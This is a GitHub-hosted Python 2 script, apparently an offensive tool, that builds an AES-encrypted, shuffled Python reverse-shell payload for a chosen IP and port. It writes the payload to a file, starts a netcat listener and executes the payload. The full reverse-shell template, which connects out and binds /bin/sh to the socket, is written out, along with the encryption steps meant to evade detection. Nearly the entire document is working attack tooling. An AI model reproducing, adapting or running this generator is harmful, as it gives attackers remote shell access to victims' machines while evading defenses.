-
Notifications
You must be signed in to change notification settings - Fork 16
/
offensive-security-certified-script-kiddie
218 lines (118 loc) · 4.44 KB
/
offensive-security-certified-script-kiddie
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
import re,random,string,Crypto,binascii,base64,sys,os,time,subprocess
from Crypto.Cipher import AES
from binascii import hexlify
from base64 import b64decode, b64encode
import Evasion
from Evasion import readPayloadTemplate,findIndexValue, commandSegmentationTech,reconstituteLine,reconstitutePayload,template_reverse_shell
import toolkits
from toolkits import red, green, yellow, cyan
import json
arrayList = []
def generateKey(size=32,chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def generateIV(size=16,chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def cryptor(shellcommands, key, IV):
shellcommands = str(shellcommands)
obj = AES.new(key,AES.MODE_CFB,IV)
ciphertext = obj.encrypt(shellcommands)
return ciphertext
def safeDecryptShellCommands(ciphertext, key, IV):
obj3 = AES.new(key,AES.MODE_CFB,IV)
plainTextCmd = obj3.decrypt(ciphertext)
return plainTextCmd
def executeEncryptedPayload(payload,decryptKey,decryptIV):
r = open(payload,'r+')
cryptedPayload = r.read()
r.close()
x = safeDecryptShellCommands(cryptedPayload,decryptKey,decryptIV)
lines = x.splitlines()
return lines
banner = """
"""
print banner
if len(sys.argv) < 3:
print "Usage\r\npython generator.py <IPAddr> <Port>"
exit(0)
else:
LHOST=str(sys.argv[1])
LPORT=int(sys.argv[2])
template_reverse_shell = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{}",{}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
""".format(
str(LHOST),
int(LPORT)
)
timestr = time.strftime("%Y%m%d-%H%M%S")
payload2="darklordobama_{}.py".format(str(timestr))
template_reverse_shell = template_reverse_shell.strip().rstrip()
def writeUniquePayload(code,l_encrypted,decryptKey,decryptIV,outfile=payload2):
cmd = "touch {}".format(str(outfile))
subprocess.call(cmd,shell=True,executable='/bin/bash')
out = b64encode(l_encrypted)
w = open(outfile,'wb+')
c = code.splitlines()
for line in c:
if 'key=' in line:
kline = 'key="""{}"""'.format(str(decryptKey))
line = line.replace('key=',kline)
if 'iv=' in line:
ivline = 'iv="""{}"""'.format(str(decryptIV))
line = line.replace('iv=',ivline)
if 'pld=' in line:
pldline1 = 'pld=str("""'
pldline2 = "{}".format(str(out))
pldline3 = '""")'
pldline = """
{}
{}
{}
""".format(
str(pldline1),
str(pldline2),
str(pldline3)
)
line = line.replace('pld=',pldline)
w.write('\r\n'+line)
w.close()
cmd = "ls $PWD/{}".format(str(outfile))
of = subprocess.Popen(cmd,shell=True,executable='/bin/bash',stdout=subprocess.PIPE,stderr=subprocess.PIPE)
ofile = str(of.stdout.read().encode('utf-8')).strip().rstrip()
print "Payload saved at:\r\n{}".format(str(ofile))
return outfile
def read_template(template="./payload_template.py"):
r = open(template,'rb+')
code = r.read()
r.close()
return code
def main():
decryptKey = generateKey()
decryptIV = generateIV()
code = read_template()
template_reverse_shell
payloadNoEncrypt = template_reverse_shell.splitlines()
shuffledPayload = commandSegmentationTech(payloadNoEncrypt)
l_encrypted = cryptor(shuffledPayload,decryptKey,decryptIV)
outfile = writeUniquePayload(code,l_encrypted,decryptKey,decryptIV)
print red("DEBUG: Shuffled payload\r\n{}".format(str(shuffledPayload)))
out = b64encode(l_encrypted)
print yellow("DEBUG: Encrypted payload\r\n{}".format(str(out)))
print green("DEBUG: Payload generated at\r\n{}".format(str(outfile)))
rp = open(outfile,'rb+')
uniquePayload = rp.read()
print red("DEBUG: Contents of {}\r\n".format(str(outfile)))
print yellow(uniquePayload)
print cyan("Opening netcat session")
os.system("""gnome-terminal -e 'bash -c "nc -nvlp {}"'""".format(str(LPORT)))
print green("You may run the payload with\r\npython {}".format(str(outfile)))
time.sleep(2)
print green("Executing payload")
os.system("python {}".format(str(outfile)))
return
main()